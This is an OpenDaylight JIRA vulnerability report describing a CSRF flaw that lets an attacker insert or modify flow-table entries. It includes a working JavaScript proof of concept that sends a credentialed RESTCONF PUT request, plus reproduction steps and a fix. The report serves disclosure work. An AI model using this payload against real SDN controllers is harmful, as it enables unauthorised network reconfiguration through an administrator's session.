[AAA-197] [CSRF] Attacker can insert or modify the entry of flow table

Duplicate — Wed, 6 Jul 2022 11:58:02 +0000

Brief of this vulnerability

Attacker can insert or modify the entry of flow table. This attack was verified on Sodium-SR1. Although not tested in other versions, it is expected to be applicable.

Description

HI I found csrf bug on flow table inserting and modifying. It can be dangerous for admin. The victim admin can insert the attacker's intended flow into the flow table.

CSRF POC is below :

<meta charset="utf-8">
<script  src="http://code.jquery.com/jquery-latest.min.js"></script>
 
<script language ="javascript" type = "text/javascript" >
var createCORSRequest = function(method, url) {
  var xhr = new XMLHttpRequest();
  if ("withCredentials" in xhr) {
    // Most browsers.
    xhr.open(method, url, true);
  } else if (typeof XDomainRequest != "undefined") {
    // IE8 & IE9
    xhr = new XDomainRequest();
    xhr.open(method, url);
  } else {
    // CORS not supported.
    xhr = null;
  }
  return xhr;
};
 
var url = 'http://127.0.0.1:8181/restconf/config/opendaylight-inventory:nodes/node/openflow:1/table/0/flow/1';
var method = 'PUT';
var xhr = createCORSRequest(method, url);
 
xhr.onload = function() {
  // Success code goes here.
};
 
xhr.onerror = function() {
  // Error code goes here.
};
 
xhr.setRequestHeader('Content-Type', 'application/xml')
xhr.withCredentials = true;
xhr.send('<?xml version="1.0" encoding="UTF-8" standalone="no"?><flow xmlns="urn:opendaylight:flow:inventory"><priority>4</priority><flow-name>asdfa</flow-name><match><ethernet-match><ethernet-type><type>2048</type></ethernet-type></ethernet-match><ipv4-destination>10.0.0.1/24</ipv4-destination></match><id>1</id><table_id>0</table_id><instructions><instruction><order>0</order><apply-actions><action><order>0</order><dec-nw-ttl/></action></apply-actions></instruction></instructions></flow>');
 
</script>

This attack is an example because ODL itself is vulnerable to CSRF attacks.

In fact, for any function that sets ODL controller using REST API, we can make arbitrary malicious settings using CSRF attack.

If an administrator accesses an arbitrary web page created by an attacker, Floodlight can be configured with arbitrary settings

To Reproduce:

Administrator's benign access
Administrator logged in to the dlux gui via the browser with admin account
Administrator accesses ODL controller using REST API in browser with admin account

Administrator visits the malicious webpage

Solution:

Check CSRF tokens in all request.

OpenDaylight JIRA

[AAA-197] [CSRF] Attacker can insert or modify the entry of flow table

Solution: